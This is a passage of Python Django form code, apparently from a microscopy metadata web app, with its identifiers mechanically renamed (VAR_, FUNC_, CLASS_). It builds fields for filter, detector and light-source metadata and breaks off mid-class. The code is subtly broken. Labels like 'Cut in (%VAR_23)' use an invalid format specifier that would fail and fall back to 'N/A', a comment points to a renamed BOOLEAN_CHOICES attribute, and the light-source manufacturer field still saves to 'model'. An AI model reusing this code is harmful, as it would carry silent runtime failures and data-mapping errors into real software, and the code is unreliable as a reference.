                                "refractiveIndex",
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["objectiveSettings"].refractiveIndex,
                    label="Refractive index",
                    required=False,
                )
            else:
                self.fields["refractiveIndex"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["objectiveSettings"].id,
                                "refractiveIndex",
                            ),
                        }
                    ),
                    label="Refractive index",
                    required=False,
                )
            FUNC_1(self.fields["refractiveIndex"])
        except Exception:
            self.fields["refractiveIndex"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Refractive index",
                required=False,
            )
            FUNC_1(self.fields["refractiveIndex"])
        # Fixed display order: Objective fields first, then the
        # ObjectiveSettings-specific ones.
        self.fields.keyOrder = [
            "model",
            "manufacturer",
            "serialNumber",
            "lotNumber",
            "nominalMagnification",
            "calibratedMagnification",
            "lensNA",
            "immersion",
            "correction",
            "workingDistance",
            "iris",
            "correctionCollar",
            "medium",
            "refractiveIndex",
        ]
class CLASS_18(forms.Form):
    """Form for editing Filter metadata.

    Fields are built from ``kwargs["initial"]["filter"]`` (plus its
    transmittance range): set attributes pre-populate the field,
    otherwise an empty editable field is created, and any failure while
    reading the metadata falls back to an "N/A" placeholder via the
    ``except`` branch.  ``FUNC_0(id, name, ...)`` produces the widget's
    ``onchange`` handler for the given object id and metadata field
    name; ``FUNC_1`` is applied to every field after creation.
    """

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_18, self).__init__(*VAR_11, **VAR_12)
        # -- manufacturer --------------------------------------------------
        try:
            if VAR_12["initial"]["filter"].manufacturer is not None:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "manufacturer"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["filter"].manufacturer,
                    required=False,
                )
            else:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "manufacturer"
                            ),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["manufacturer"])
        except Exception:
            self.fields["manufacturer"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["manufacturer"])
        # -- model ---------------------------------------------------------
        try:
            if VAR_12["initial"]["filter"].model is not None:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "model"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["filter"].model,
                    required=False,
                )
            else:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "model"
                            ),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["model"])
        except Exception:
            self.fields["model"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["model"])
        # -- serialNumber --------------------------------------------------
        try:
            if VAR_12["initial"]["filter"].serialNumber is not None:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "serialNumber"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["filter"].serialNumber,
                    label="Serial number",
                    required=False,
                )
            else:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "serialNumber"
                            ),
                        }
                    ),
                    label="Serial number",
                    required=False,
                )
            FUNC_1(self.fields["serialNumber"])
        except Exception:
            self.fields["serialNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Serial number",
                required=False,
            )
            FUNC_1(self.fields["serialNumber"])
        # -- lotNumber -----------------------------------------------------
        try:
            if VAR_12["initial"]["filter"].lotNumber is not None:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "lotNumber"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["filter"].lotNumber,
                    label="Lot number",
                    required=False,
                )
            else:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "lotNumber"
                            ),
                        }
                    ),
                    label="Lot number",
                    required=False,
                )
            FUNC_1(self.fields["lotNumber"])
        except Exception:
            self.fields["lotNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Lot number",
                required=False,
            )
            FUNC_1(self.fields["lotNumber"])
        # -- filterWheel ---------------------------------------------------
        try:
            if VAR_12["initial"]["filter"].filterWheel is not None:
                self.fields["filterWheel"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "filterWheel"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["filter"].filterWheel,
                    label="Filter wheel",
                    required=False,
                )
            else:
                self.fields["filterWheel"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "filterWheel"
                            ),
                        }
                    ),
                    label="Filter wheel",
                    required=False,
                )
            FUNC_1(self.fields["filterWheel"])
        except Exception:
            self.fields["filterWheel"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Filter wheel",
                required=False,
            )
            FUNC_1(self.fields["filterWheel"])
        # -- type (enumeration) --------------------------------------------
        try:
            if VAR_12["initial"]["filter"].getFilterType() is not None:
                self.fields["type"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["types"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "type", VAR_7=True
                            )
                        }
                    ),
                    initial=VAR_12["initial"]["filter"].getFilterType().value,
                    required=False,
                )
            else:
                self.fields["type"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["types"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "type", VAR_7=True
                            )
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["type"])
        except Exception:
            self.fields["type"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["type"])
        # Transmittance range shared by the cutIn/cutOut fields below.
        VAR_38 = VAR_12["initial"]["filter"].getTransmittanceRange()
        # -- cutIn ---------------------------------------------------------
        try:
            if VAR_38 is not None and VAR_38.cutIn is not None:
                self.fields["cutIn"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "cutIn"
                            ),
                        }
                    ),
                    initial=VAR_12["initial"]["filter"]
                    .getTransmittanceRange()
                    .cutIn.getValue(),
                    label="Cut in (%VAR_23)" % VAR_38.cutIn.getSymbol(),
                    required=False,
                )
            else:
                self.fields["cutIn"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "cutIn"
                            ),
                        }
                    ),
                    label="Cut in",
                    required=False,
                )
            FUNC_1(self.fields["cutIn"])
        except Exception:
            self.fields["cutIn"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Cut in",
                required=False,
            )
            FUNC_1(self.fields["cutIn"])
        # -- cutOut --------------------------------------------------------
        try:
            if VAR_38 is not None and VAR_38.cutOut is not None:
                self.fields["cutOut"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "cutOut"
                            ),
                        }
                    ),
                    initial=VAR_38.cutOut.getValue(),
                    label="Cut out (%VAR_23)" % VAR_38.cutOut.getSymbol(),
                    required=False,
                )
            else:
                self.fields["cutOut"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "cutOut"
                            ),
                        }
                    ),
                    label="Cut out",
                    required=False,
                )
            FUNC_1(self.fields["cutOut"])
        except Exception:
            self.fields["cutOut"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Cut out",
                required=False,
            )
            FUNC_1(self.fields["cutOut"])
        # -- cutInTolerance ------------------------------------------------
        try:
            if VAR_38 is not None and VAR_38.cutInTolerance is not None:
                self.fields["cutInTolerance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "cutInTolerance"
                            ),
                        }
                    ),
                    initial=VAR_38.cutInTolerance.getValue(),
                    label=("Cut in tolerance (%VAR_23)" % VAR_38.cutInTolerance.getSymbol()),
                    required=False,
                )
            else:
                self.fields["cutInTolerance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "cutInTolerance"
                            ),
                        }
                    ),
                    label="Cut in tolerance",
                    required=False,
                )
            FUNC_1(self.fields["cutInTolerance"])
        except Exception:
            self.fields["cutInTolerance"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Cut in tolerance",
                required=False,
            )
            FUNC_1(self.fields["cutInTolerance"])
        # -- cutOutTolerance -----------------------------------------------
        try:
            if VAR_38 is not None and VAR_38.cutOutTolerance is not None:
                self.fields["cutOutTolerance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            # Fix: saved "cutOut" (copy-paste from the cutOut
                            # block), silently updating the wrong field.
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "cutOutTolerance"
                            ),
                        }
                    ),
                    initial=VAR_38.cutOutTolerance.getValue(),
                    label=("Cut out tolerance (%VAR_23)" % VAR_38.cutOutTolerance.getSymbol()),
                    required=False,
                )
            else:
                self.fields["cutOutTolerance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            # Fix: same copy-paste as above.
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "cutOutTolerance"
                            ),
                        }
                    ),
                    label="Cut out tolerance",
                    required=False,
                )
            FUNC_1(self.fields["cutOutTolerance"])
        except Exception:
            self.fields["cutOutTolerance"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Cut out tolerance",
                required=False,
            )
            FUNC_1(self.fields["cutOutTolerance"])
        # -- transmittance (stored as a fraction, shown as a percentage) ---
        try:
            if VAR_12["initial"]["filter"].transmittanceRange is not None:
                self.fields["transmittance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "transmittance"
                            ),
                        }
                    ),
                    initial=formatPercentFraction(
                        VAR_12["initial"]["filter"]
                        .getTransmittanceRange()
                        .transmittance
                    ),
                    label="Transmittance (%)",
                    required=False,
                )
            else:
                self.fields["transmittance"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(
                                VAR_12["initial"]["filter"].id, "transmittance"
                            ),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["transmittance"])
        except Exception:
            self.fields["transmittance"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["transmittance"])
        # Fixed display order of the fields.
        self.fields.keyOrder = [
            "model",
            "manufacturer",
            "serialNumber",
            "lotNumber",
            "type",
            "filterWheel",
            "cutIn",
            "cutOut",
            "cutInTolerance",
            "cutOutTolerance",
            "transmittance",
        ]
class CLASS_19(forms.Form):
    """Form for editing Detector / DetectorSettings metadata.

    Reads ``kwargs["initial"]["detectorSettings"]`` (may be None) and
    ``kwargs["initial"]["detector"]``; settings values take priority
    over detector values where both exist (gain, voltage, offset).  Any
    failure while reading the metadata — including attribute access on
    a None object in an else branch — falls back to an "N/A"
    placeholder field via the ``except`` branch.  ``FUNC_0(id, name,
    ...)`` produces the widget's ``onchange`` handler; ``FUNC_1`` is
    applied to every field after creation.
    """

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_19, self).__init__(*VAR_11, **VAR_12)
        VAR_39 = VAR_12["initial"]["detectorSettings"]
        VAR_40 = VAR_12["initial"]["detector"]
        # -- manufacturer --------------------------------------------------
        try:
            if VAR_40 is not None:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_40.id, "manufacturer"),
                        }
                    ),
                    initial=VAR_40.manufacturer,
                    required=False,
                )
            else:
                # With VAR_40 None this raises and drops to the fallback.
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_40.id, "manufacturer"),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["manufacturer"])
        except Exception:
            self.fields["manufacturer"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["manufacturer"])
        # -- model ---------------------------------------------------------
        try:
            if VAR_40 is not None:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_40.id, "model"),
                        }
                    ),
                    initial=VAR_40.model,
                    required=False,
                )
            else:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_40.id, "model"),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["model"])
        except Exception:
            self.fields["model"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["model"])
        # -- serialNumber --------------------------------------------------
        try:
            if VAR_40 is not None:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_40.id, "serialNumber"),
                        }
                    ),
                    initial=VAR_40.serialNumber,
                    required=False,
                )
            else:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_40.id, "serialNumber"),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["serialNumber"])
        except Exception:
            self.fields["serialNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["serialNumber"])
        # -- lotNumber -----------------------------------------------------
        try:
            if VAR_40 is not None:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_40.id, "lotNumber"),
                        }
                    ),
                    initial=VAR_40.lotNumber,
                    required=False,
                )
            else:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_40.id, "lotNumber"),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["lotNumber"])
        except Exception:
            self.fields["lotNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["lotNumber"])
        # -- type (enumeration) --------------------------------------------
        try:
            if VAR_40.getDetectorType() is not None:
                self.fields["type"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["types"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(VAR_40.id, "type", VAR_7=True)
                        }
                    ),
                    initial=VAR_40.getDetectorType().value,
                    required=False,
                )
            else:
                self.fields["type"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["types"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            "onchange": FUNC_0(VAR_40.id, "type", VAR_7=True)
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["type"])
        except Exception:
            self.fields["type"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["type"])
        # -- gain (settings value preferred over detector value) -----------
        try:
            if VAR_39 is not None:
                self.fields["gain"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={"size": 25, "onchange": FUNC_0(VAR_39.id, "gain")}
                    ),
                    initial=VAR_39.gain,
                    required=False,
                )
            elif VAR_40 is not None:
                self.fields["gain"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_40.id, "gain"),
                        }
                    ),
                    initial=VAR_40.gain,
                    required=False,
                )
            else:
                self.fields["gain"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={"size": 25, "onchange": FUNC_0(VAR_39.id, "gain")}
                    ),
                    required=False,
                )
            FUNC_1(self.fields["gain"])
        except Exception:
            self.fields["gain"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["gain"])
        # -- voltage (unit-bearing; settings preferred) --------------------
        try:
            if VAR_39 is not None and VAR_39.voltage is not None:
                self.fields["voltage"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_39.id, "voltage"),
                        }
                    ),
                    initial=VAR_39.voltage.getValue(),
                    label="Voltage (%VAR_23)" % VAR_39.voltage.getSymbol(),
                    required=False,
                )
            elif VAR_40 is not None:
                self.fields["voltage"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_40.id, "voltage"),
                        }
                    ),
                    initial=VAR_40.voltage.getValue(),
                    label="Voltage (%VAR_23)" % VAR_40.voltage.getSymbol(),
                    required=False,
                )
            else:
                self.fields["voltage"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_39.id, "voltage"),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["voltage"])
        except Exception:
            self.fields["voltage"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["voltage"])
        # -- offsetValue (settings preferred) ------------------------------
        try:
            if VAR_39 is not None:
                self.fields["offsetValue"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_39.id, "offsetValue"),
                        }
                    ),
                    initial=VAR_39.offsetValue,
                    label="Offset",
                    required=False,
                )
            elif VAR_40 is not None:
                self.fields["offsetValue"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_40.id, "offsetValue"),
                        }
                    ),
                    initial=VAR_40.offsetValue,
                    label="Offset",
                    required=False,
                )
            else:
                self.fields["offsetValue"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_40.id, "offsetValue"),
                        }
                    ),
                    label="Offset",
                    required=False,
                )
            FUNC_1(self.fields["offsetValue"])
        except Exception:
            self.fields["offsetValue"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Offset",
                required=False,
            )
            FUNC_1(self.fields["offsetValue"])
        # -- zoom ----------------------------------------------------------
        try:
            if VAR_40 is not None:
                self.fields["zoom"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            # Fix: saved "voltage" (copy-paste from the voltage
                            # block), silently updating the wrong field.
                            "onchange": FUNC_0(VAR_40.id, "zoom"),
                        }
                    ),
                    initial=VAR_40.zoom,
                    required=False,
                )
            else:
                self.fields["zoom"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            # Fix: same copy-paste as above.
                            "onchange": FUNC_0(VAR_40.id, "zoom"),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["zoom"])
        except Exception:
            self.fields["zoom"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["zoom"])
        # -- amplificationGain ---------------------------------------------
        try:
            if VAR_40 is not None:
                self.fields["amplificationGain"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_40.id, "amplificationGain"),
                        }
                    ),
                    initial=VAR_40.amplificationGain,
                    label="Amplification gain",
                    required=False,
                )
            else:
                self.fields["amplificationGain"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_40.id, "amplificationGain"),
                        }
                    ),
                    label="Amplification gain",
                    required=False,
                )
            FUNC_1(self.fields["amplificationGain"])
        except Exception:
            self.fields["amplificationGain"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Amplification gain",
                required=False,
            )
            FUNC_1(self.fields["amplificationGain"])
        # -- readOutRate (unit-bearing, settings only) ---------------------
        try:
            if VAR_39 is not None and VAR_39.readOutRate is not None:
                self.fields["readOutRate"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_39.id, "readOutRate"),
                        }
                    ),
                    initial=VAR_39.readOutRate.getValue(),
                    label=("Read out rate (%VAR_23)" % VAR_39.readOutRate.getSymbol()),
                    required=False,
                )
            else:
                self.fields["readOutRate"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_39.id, "readOutRate"),
                        }
                    ),
                    label="Read out rate",
                    required=False,
                )
            FUNC_1(self.fields["readOutRate"])
        except Exception:
            self.fields["readOutRate"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Read out rate",
                required=False,
            )
            FUNC_1(self.fields["readOutRate"])
        # -- binning (enumeration, settings only) --------------------------
        try:
            if VAR_39 is not None:
                self.fields["binning"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["binnings"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            # Fix: saved "type" (copy-paste from the type
                            # block), which would overwrite the detector type.
                            "onchange": FUNC_0(VAR_39.id, "binning", VAR_7=True)
                        }
                    ),
                    initial=VAR_39.getBinning().value,
                    required=False,
                )
            else:
                self.fields["binning"] = MetadataModelChoiceField(
                    queryset=VAR_12["initial"]["binnings"],
                    empty_label="Not set",
                    widget=forms.Select(
                        attrs={
                            # Fix: same copy-paste as above.
                            "onchange": FUNC_0(VAR_39.id, "binning", VAR_7=True)
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["binning"])
        except Exception:
            self.fields["binning"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["binning"])
        # Fixed display order of the fields.
        self.fields.keyOrder = [
            "model",
            "manufacturer",
            "serialNumber",
            "lotNumber",
            "type",
            "gain",
            "voltage",
            "offsetValue",
            "zoom",
            "amplificationGain",
            "readOutRate",
            "binning",
        ]
class CLASS_20(forms.Form):
    """Read-only form presenting light-source metadata.

    Fields are built from the ``lightSource`` object (and the optional
    ``lightSourceSettings`` object) found in ``kwargs["initial"]``.  Every
    field follows the same pattern: try to build the field with the real
    value as ``initial``; if the attribute is unset build it without an
    initial; if reading the value raises, fall back to a plain "N/A"
    CharField.  Each field is then disabled via FUNC_1 so the form renders
    as read-only metadata.
    """

    # Choices for boolean-ish selects.  NOTE(review): the code below refers
    # to ``self.BOOLEAN_CHOICES`` — confirm this attribute name against the
    # original (un-obfuscated) source.
    VAR_24 = (
        ("", "---------"),
        ("True", "True"),
        ("False", "False"),
    )

    def __init__(self, *VAR_11, **VAR_12):
        super(CLASS_20, self).__init__(*VAR_11, **VAR_12)
        VAR_41 = VAR_12["initial"]["lightSource"]
        VAR_42 = None
        if "lightSourceSettings" in VAR_12["initial"]:
            VAR_42 = VAR_12["initial"]["lightSourceSettings"]
        self.lightSourceType = VAR_41.OMERO_CLASS
        # manufacturer
        try:
            if VAR_41.manufacturer is not None:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_41.id, "model"),
                        }
                    ),
                    initial=VAR_41.manufacturer,
                    required=False,
                )
            else:
                self.fields["manufacturer"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_41.id, "model"),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["manufacturer"])
        except Exception:
            self.fields["manufacturer"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["manufacturer"])
        # model
        try:
            if VAR_41.model is not None:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_41.id, "model"),
                        }
                    ),
                    initial=VAR_41.model,
                    required=False,
                )
            else:
                self.fields["model"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_41.id, "model"),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["model"])
        except Exception:
            self.fields["model"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                required=False,
            )
            FUNC_1(self.fields["model"])
        # serialNumber
        try:
            if VAR_41.serialNumber is not None:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_41.id, "serialNumber"),
                        }
                    ),
                    initial=VAR_41.serialNumber,
                    label="Serial number",
                    required=False,
                )
            else:
                self.fields["serialNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_41.id, "serialNumber"),
                        }
                    ),
                    label="Serial number",
                    required=False,
                )
            FUNC_1(self.fields["serialNumber"])
        except Exception:
            self.fields["serialNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Serial number",
                required=False,
            )
            FUNC_1(self.fields["serialNumber"])
        # lotNumber
        try:
            if VAR_41.lotNumber is not None:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_41.id, "lotNumber"),
                        }
                    ),
                    initial=VAR_41.lotNumber,
                    label="Lot number",
                    required=False,
                )
            else:
                self.fields["lotNumber"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_41.id, "lotNumber"),
                        }
                    ),
                    label="Lot number",
                    required=False,
                )
            FUNC_1(self.fields["lotNumber"])
        except Exception:
            self.fields["lotNumber"] = forms.CharField(
                max_length=10,
                widget=forms.TextInput(attrs={"size": 25}),
                initial="N/A",
                label="Lot number",
                required=False,
            )
            FUNC_1(self.fields["lotNumber"])
        # power (a unit-carrying value; label embeds its symbol)
        try:
            if VAR_41.power is not None:
                self.fields["power"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_41.id, "power"),
                        }
                    ),
                    initial=VAR_41.power.getValue(),
                    label="Power (%VAR_23)" % VAR_41.power.getSymbol(),
                    required=False,
                )
            else:
                self.fields["power"] = forms.CharField(
                    max_length=100,
                    widget=forms.TextInput(
                        attrs={
                            "size": 25,
                            "onchange": FUNC_0(VAR_41.id, "power"),
                        }
                    ),
                    required=False,
                )
            FUNC_1(self.fields["power"])
        except Exception:
            self.fields["power"] = forms.CharField(
